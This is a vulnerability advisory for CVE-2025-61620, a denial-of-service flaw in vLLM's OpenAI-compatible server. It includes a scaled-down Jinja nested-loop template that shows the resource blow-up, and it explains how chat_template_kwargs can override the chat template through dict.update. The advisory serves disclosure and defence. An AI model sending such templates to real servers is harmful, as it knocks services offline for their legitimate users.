PT-2025-41232 · PyPI · vLLM
Published
2025-10-07
·
Updated
2025-10-07
·
CVE-2025-61620
CVSS v3.1
6.5
Medium
| AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
Summary
A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server because Jinja templates can be specified via the chat_template and chat_template_kwargs parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.
Details
When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In HF/transformers, this rendering is performed with a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a chat_template parameter that lets users specify that template. In addition, the server accepts a chat_template_kwargs parameter to pass extra keyword arguments to the rendering function. Because Jinja templates support programming-language-like constructs (loops, nested iteration, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.
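To make the amplification concrete, here is a minimal, deliberately scaled-down sketch (using the jinja2 package directly, outside of vLLM) of how nested loops let a tiny template produce disproportionately large output; raising the loop bounds makes the CPU and memory cost grow multiplicatively:

```python
# Scaled-down sketch: a ~100-byte template whose nested loops multiply
# the amount of work and output the renderer must produce. With large
# bounds (e.g. range(10**6)), rendering exhausts CPU/memory.
from jinja2 import Template

malicious = Template(
    "{% for i in range(50) %}"
    "{% for j in range(50) %}"
    "{{ 'x' * 100 }}"
    "{% endfor %}{% endfor %}"
)
out = malicious.render()
print(len(out))  # 50 * 50 * 100 = 250000 characters of output
```

The rendered size scales as the product of the loop bounds times the per-iteration payload, so an attacker controls the blow-up factor with a few characters.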
Importantly, simply forbidding the chat_template parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for apply_hf_chat_template and then updates that dictionary with the user-supplied chat_template_kwargs via dict.update. Since dict.update can overwrite existing keys, an attacker can place a chat_template key inside chat_template_kwargs to replace the template that will be used by apply_hf_chat_template.

# vllm/entrypoints/openai/serving_engine.py#L794-L816
_chat_template_kwargs: dict[str, Any] = dict(
    chat_template=chat_template,
    add_generation_prompt=add_generation_prompt,
    continue_final_message=continue_final_message,
    tools=tool_dicts,
    documents=documents,
)
_chat_template_kwargs.update(chat_template_kwargs or {})

request_prompt: Union[str, list[int]]
if isinstance(tokenizer, MistralTokenizer):
    ...
else:
    request_prompt = apply_hf_chat_template(
        tokenizer=tokenizer,
        conversation=conversation,
        model_config=model_config,
        **_chat_template_kwargs,
    )
Impact
If an OpenAI-Compatible Server exposes endpoints that accept chat_template or chat_template_kwargs from untrusted clients, an attacker can submit a malicious Jinja template (directly, or by overriding chat_template inside chat_template_kwargs) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial of service that renders the server unresponsive to legitimate requests.
Fixes
Fix
Allocation of Resources Without Limits
Resource Exhaustion
Related Identifiers
Affected Products
vLLM